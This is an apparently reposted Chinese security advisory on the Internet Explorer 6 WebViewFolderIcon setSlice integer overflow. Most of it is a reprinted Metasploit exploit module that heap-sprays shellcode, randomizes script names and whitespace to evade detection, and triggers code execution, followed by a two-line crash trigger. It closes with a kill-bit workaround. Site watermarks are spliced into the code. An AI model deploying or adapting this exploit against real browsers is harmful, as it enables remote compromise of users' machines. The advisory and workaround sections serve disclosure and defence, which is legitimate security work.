涉及程序:
Microsoft IE WebViewFolderIcon
描述:
Microsoft IE WebViewFolderIcon远程整数溢出漏洞
详细:
Internet Explorer是微软发布的非常流行的WEB浏览器。
Internet Explorer在处理畸形的ActiveX对象调用方式时存在整数溢出漏洞,远程攻击者可能利用此漏洞导致浏览器崩溃或执行任意指令。
如果攻击者能够向WebViewFolderIcon控件的setSlice方法传送0x7fffffff参数的话,可能导致浏览器崩溃或执行任意指令。
<*来源:H D Moore (hdm@metasploit.com)
链接:(http://browserfun.blogspot.com/
(http://www.kb.cert.org/vuls/id/753044
(http://www.us-cert.gov/cas/techalerts/TA06-270A.html
*>
受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
攻击方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
require 'msf/core'
module Msf
class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote
网管bitscn_com
include Exploit::Remote::HttpServer::Html
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
'Description' => %q{
This module exploits a flaw in the WebViewFolderIcon ActiveX control
included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
during the Month of Browser Bugs project (MoBB #18).
},
'License' => MSF_LICENSE,
'Author'=>
[
'hdm',
],
'Version' => '$Revision: 3783 $',
'References' =>
[
[ 'OSVDB', '27110' ],
[ 'BID', '19030' ],
[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
网管u家u.bitscn@com ],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Get a unicode friendly version of the return address
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
网管网www_bitscn_com
# Randomize the javascript variable names
var_buffer = Rex::Text.rand_text_alpha(rand(30)+2)
var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
var_x= Rex::Text.rand_text_alpha(rand(30)+2)
var_i= Rex::Text.rand_text_alpha(rand(30)+2)
var_tic = Rex::Text.rand_text_alpha(rand(30)+2)
var_toc = Rex::Text.rand_text_alpha(rand(30)+2)
# Randomize HTML data
html = Rex::Text.rand_text_alpha(rand(30)+2)
# Build out the message
content = %Q|
<html>
<head>
<script>
try {
var # = unescape ;
var # = #( "#" ) ;
var # = #( "%u#" ) ;
while (#.length <= 0x400000) #+=# ;
var # = new Array() ;
网管u家u.bitsCN.com for ( var # =0 ; # < 30 ; #++ ) {
#[ # ] =
#.substring( 0 , 0x100000 - #.length ) + # +
#.substring( 0 , 0x100000 - #.length ) + # +
#.substring( 0 , 0x100000 - #.length ) + # +
#.substring( 0 , 0x100000 - #.length ) + # ;
}
for ( var # = 0 ; # < 1024 ; #++) {
var # = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
try { #.setSlice( 0x7ffffffe , 0 , 0 , # ) ; } catch( e ) { }
var # = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
}
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
<body>
#
</body>
</html>
|
# Randomize the whitespace in the document
content.gsub!(/\s+/) do |s|
len = rand(100)+2
网管论坛bbs_bitsCN_com
set = "\x09\x20\x0d\x0a"
buf = ''
while (buf.length < len)
buf << set[rand(set.length)].chr
end
buf
end
print_status("Sending exploit to #:#...")
# Transmit the response to the client
send_response(cli, content)
end
end
end
===============================================
var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);
解决方案:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 禁用WebViewFolderIcon ActiveX控件
为以下CLSID设置kill bit来禁用WebViewFolderIcon控件:
厂商补丁:
Microsoft
网管下载dl.bitscn.com
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
(http://www.microsoft.com/windows/ie/default.asp
评论加载中…
